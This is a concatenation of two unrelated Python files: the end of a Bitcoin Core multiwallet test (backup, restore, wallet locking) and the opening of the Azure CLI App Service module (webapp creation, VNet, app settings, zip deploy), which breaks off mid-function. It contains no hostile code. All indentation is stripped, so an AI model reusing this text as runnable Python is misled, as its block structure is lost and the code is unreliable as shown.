addr = rpc.getnewaddress()
backup = os.path.join(self.options.tmpdir, 'backup.dat')
if os.path.exists(backup):
os.unlink(backup)
rpc.backupwallet(backup)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(backup, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], True)
# Test .walletlock file is closed
self.start_node(1)
wallet = os.path.join(self.options.tmpdir, 'my_wallet')
self.nodes[0].createwallet(wallet)
if self.options.descriptors:
assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
else:
assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
self.nodes[0].unloadwallet(wallet)
self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
MultiWalletTest().main()
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import ast
import threading
import time
from urllib.parse import urlparse
from urllib.request import urlopen
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
import invoke
from nacl import encoding, public
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait
from azure.cli.core.util import get_az_user_agent, send_raw_request, get_file_json
from azure.cli.core.profiles import ResourceType, get_sdk
from azure.cli.core.azclierror import (InvalidArgumentValueError, MutuallyExclusiveArgumentError, ResourceNotFoundError,
RequiredArgumentMissingError, ValidationError, CLIInternalError,
UnclassifiedUserFault, AzureResponseError, AzureInternalError,
ArgumentUsageError)
from .tunnel import TunnelServer
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation, _generic_settings_operation
from .utils import (_normalize_sku,
get_sku_tier,
retryable_method,
raise_missing_token_suggestion,
_get_location_from_resource_group,
_list_app,
_rename_server_farm_props,
_get_location_from_webapp,
_normalize_location,
get_pool_manager, use_additional_properties, get_app_service_plan_from_webapp,
get_resource_if_exists)
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
check_resource_group_exists, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime, generate_default_app_name)
from ._constants import (FUNCTIONS_STACKS_API_KEYS, FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX,
FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, FUNCTIONS_NO_V2_REGIONS, PUBLIC_CLOUD,
LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH, WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH,
DOTNET_RUNTIME_NAME, NETCORE_RUNTIME_NAME, ASPDOTNET_RUNTIME_NAME, LINUX_OS_NAME,
WINDOWS_OS_NAME)
from ._github_oauth import (get_github_access_token)
from ._validators import validate_and_convert_to_int, validate_range_of_int_flag
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None, assign_identities=None,
role='Contributor', scope=None, vnet=None, subnet=None):
from azure.mgmt.web.models import Site
SiteConfig, SkuDescription, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise MutuallyExclusiveArgumentError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(name=plan, resource_group_name=resource_group_name)
if not plan_info:
raise ResourceNotFoundError("The plan '{}' doesn't exist in the resource group '{}".format(plan,
resource_group_name))
is_linux = plan_info.reserved
helper = _StackRuntimeHelper(cmd, linux=is_linux, windows=not is_linux)
location = plan_info.location
# This is to keep the existing appsettings for a newly created webapp on existing webapp name.
name_validation = get_site_availability(cmd, name)
if not name_validation.name_available:
if name_validation.reason == 'Invalid':
raise ValidationError(name_validation.message)
logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise ResourceNotFoundError("Unable to retrieve details of the existing app '{}'. Please check that "
"the app is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise ValidationError("The webapp '{}' exists in resource group '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
name, 'list_application_settings')
settings = []
for k, v in existing_app_settings.properties.items():
settings.append(NameValuePair(name=k, value=v))
site_config = SiteConfig(app_settings=settings)
else:
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
if subnet or vnet:
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
_validate_vnet_integration_location(cmd=cmd, webapp_location=plan_info.location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
vnet_sub_id=subnet_info["subnet_subscription_id"])
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
site_config.vnet_route_all_enabled = True
subnet_resource_id = subnet_info["subnet_resource_id"]
else:
subnet_resource_id = None
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up, virtual_network_subnet_id=subnet_resource_id)
if runtime:
runtime = helper.remove_delimiters(runtime)
current_stack = None
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise ArgumentUsageError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
match = helper.resolve(runtime, is_linux)
if not match:
raise ValidationError("Linux Runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
helper.get_site_config_setter(match, linux=is_linux)(cmd=cmd, stack=match, site_config=site_config)
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
if deployment_container_image_name:
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
# set the needed app settings for container image validation
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
value=docker_registry_server_user))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
value=docker_registry_server_password))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
value=docker_registry_server_url))
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise ArgumentUsageError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime, linux=is_linux)
if not match:
raise ValidationError("Windows runtime '{}' is not supported. "
"Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
helper.get_site_config_setter(match, linux=is_linux)(cmd=cmd, stack=match, site_config=site_config)
# TODO: Ask Calvin the purpose of this - seems like unneeded set of calls
# portal uses the current_stack propety in metadata to display stack for windows apps
current_stack = get_current_stack_from_runtime(runtime)
else: # windows webapp without runtime specified
if name_validation.name_available: # If creating new webapp
node_default_version = helper.get_default_version("node", is_linux, get_windows_config_version=True)
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
if name_validation.name_available:
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'
.format(name)))
poller = client.web_apps.begin_create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# TO DO: (Check with Calvin) This seems to be something specific to portal client use only & should be removed
if current_stack:
_update_webapp_current_stack_property_if_needed(cmd, resource_group_name, name, current_stack)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
logger.info("Updating container settings")
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
webapp.identity = identity
return webapp
def _validate_vnet_integration_location(cmd, subnet_resource_group, vnet_name, webapp_location, vnet_sub_id=None):
from azure.cli.core.commands.client_factory import get_subscription_id
current_sub_id = get_subscription_id(cmd.cli_ctx)
if vnet_sub_id:
cmd.cli_ctx.data['subscription_id'] = vnet_sub_id
vnet_client = network_client_factory(cmd.cli_ctx).virtual_networks
vnet_location = vnet_client.get(resource_group_name=subnet_resource_group,
virtual_network_name=vnet_name).location
cmd.cli_ctx.data['subscription_id'] = current_sub_id
vnet_location = _normalize_location(cmd, vnet_location)
asp_location = _normalize_location(cmd, webapp_location)
if vnet_location != asp_location:
raise ArgumentUsageError("Unable to create webapp: vnet and App Service Plan must be in the same location. "
"vnet location: {}. Plan location: {}.".format(vnet_location, asp_location))
def _get_subnet_info(cmd, resource_group_name, vnet, subnet):
from azure.cli.core.commands.client_factory import get_subscription_id
subnet_info = {"vnet_name": None,
"subnet_name": None,
"resource_group_name": None,
"subnet_resource_id": None,
"subnet_subscription_id": None,
"vnet_resource_id": None}
if is_valid_resource_id(subnet):
if vnet:
logger.warning("--subnet argument is a resource ID. Ignoring --vnet argument.")
parsed_sub_rid = parse_resource_id(subnet)
subnet_info["vnet_name"] = parsed_sub_rid["name"]
subnet_info["subnet_name"] = parsed_sub_rid["resource_name"]
subnet_info["resource_group_name"] = parsed_sub_rid["resource_group"]
subnet_info["subnet_resource_id"] = subnet
subnet_info["subnet_subscription_id"] = parsed_sub_rid["subscription"]
vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}"
subnet_info["vnet_resource_id"] = vnet_fmt.format(parsed_sub_rid["subscription"],
parsed_sub_rid["resource_group"],
parsed_sub_rid["name"])
return subnet_info
subnet_name = subnet
if is_valid_resource_id(vnet):
parsed_vnet = parse_resource_id(vnet)
subnet_rg = parsed_vnet["resource_group"]
vnet_name = parsed_vnet["name"]
subscription_id = parsed_vnet["subscription"]
subnet_info["vnet_resource_id"] = vnet
else:
logger.warning("Assuming subnet resource group is the same as webapp. "
"Use a resource ID for --subnet or --vnet to use a different resource group.")
subnet_rg = resource_group_name
vnet_name = vnet
subscription_id = get_subscription_id(cmd.cli_ctx)
vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}"
subnet_info["vnet_resource_id"] = vnet_fmt.format(subscription_id,
subnet_rg,
vnet)
subnet_id_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}/subnets/{}"
subnet_rid = subnet_id_fmt.format(subscription_id, subnet_rg, vnet_name, subnet_name)
subnet_info["vnet_name"] = vnet_name
subnet_info["subnet_name"] = subnet_name
subnet_info["resource_group_name"] = subnet_rg
subnet_info["subnet_resource_id"] = subnet_rid
subnet_info["subnet_subscription_id"] = subscription_id
return subnet_info
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one out the combinations
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
non_url = "/" not in deployment_container_image_name
non_url = non_url or ("." not in deployment_container_image_name and ":" not in deployment_container_image_name)
if non_url:
return None
parsed_url = urlparse(deployment_container_image_name)
if parsed_url.scheme:
return parsed_url.hostname
hostname = urlparse("https://{}".format(deployment_container_image_name)).hostname
return "https://{}".format(hostname)
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest, setting_type in [(settings, result, "Settings"), (slot_settings, slot_result, "SlotSettings")]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command
for t in temp:
if 'slotSetting' in t.keys():
slot_result[t['name']] = t['slotSetting']
if setting_type == "SlotSettings":
slot_result[t['name']] = True
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(dest)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
# Slot settings logic to add a new setting(s) or remove an existing setting(s)
for slot_setting_name, value in slot_result.items():
if value and slot_setting_name not in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.append(slot_setting_name)
elif not value and slot_setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(slot_setting_name)
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because sometimes if the plan is created as part of function app,
# it can take a couple of tries before it gets the plan
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote and app.reserved:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
elif app.reserved:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check the status of async deployment
if res.status_code == 202:
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
# check if there's an ongoing process
if res.status_code == 409:
raise UnclassifiedUserFault("There may be an ongoing deployment or your app setting has "
"WEBSITE_RUN_FROM_PACKAGE. Please track your deployment in {} and ensure the "
"WEBSITE_RUN_FROM_PACKAGE app setting is removed. Use 'az webapp config "
"appsettings list --name MyWebapp --resource-group MyResourceGroup --subscription "
"MySubscription' to list app settings and 'az webapp config appsettings delete "
"--name MyWebApp --resource-group MyResourceGroup --setting-names <setting-names> "
"to delete them.".format(deployment_status_url))
# check if an error occured during deployment
if res.status_code:
raise AzureInternalError("An error occured during deployment. Status Code: {}, Details: {}"
.format(res.status_code, res.text))
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current) / float(total))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.utcnow()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ex:
# This SDK function throws an error if Status Code is 200
if ex.status_code != 200:
raise ex
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code != 200:
raise ex
def show_webapp(cmd, resource_group_name, name, slot=None):
return _show_app(cmd, resource_group_name, name, "webapp", slot)
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None, # pylint: disable=unused-argument
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs): # pylint: disable=unused-argument
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.begin_create_or_update_slot if slot else client.web_apps.begin_create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(cmd, instance, client_affinity_enabled=None, https_only=None, minimum_elastic_instance_count=None,
prewarmed_instance_count=None):
if 'function' in instance.kind:
raise ValidationError("please use 'az functionapp update' to update this function app")
if minimum_elastic_instance_count or prewarmed_instance_count:
args = ["--minimum-elastic-instance-count", "--prewarmed-instance-count"]
plan = get_app_service_plan_from_webapp(cmd, instance, api_version="2021-01-15")
sku = _normalize_sku(plan.sku.name)
if get_sku_tier(sku) not in ["PREMIUMV2", "PREMIUMV3"]:
raise ValidationError("{} are only supported for elastic premium V2/V3 SKUs".format(str(args)))
if not plan.elastic_scale_enabled:
raise ValidationError("Elastic scale is not enabled on the App Service Plan. Please update the plan ")
if (minimum_elastic_instance_count or 0) > plan.maximum_elastic_worker_count:
raise ValidationError("--minimum-elastic-instance-count: Minimum elastic instance count is greater than "
"the app service plan's maximum Elastic worker count. "
"Please choose a lower count or update the plan's maximum ")
if (prewarmed_instance_count or 0) > plan.maximum_elastic_worker_count:
raise ValidationError("--prewarmed-instance-count: Prewarmed instance count is greater than "
"the app service plan's maximum Elastic worker count. "
"Please choose a lower count or update the plan's maximum ")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
if minimum_elastic_instance_count is not None:
from azure.mgmt.web.models import SiteConfig
# Need to create a new SiteConfig object to ensure that the new property is included in request body
conf = SiteConfig(**instance.site_config.as_dict())
conf.minimum_elastic_instance_count = minimum_elastic_instance_count
instance.site_config = conf
if prewarmed_instance_count is not None:
instance.site_config.pre_warmed_instance_count = prewarmed_instance_count
return instance
def update_functionapp(cmd, instance, plan=None, force=False):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
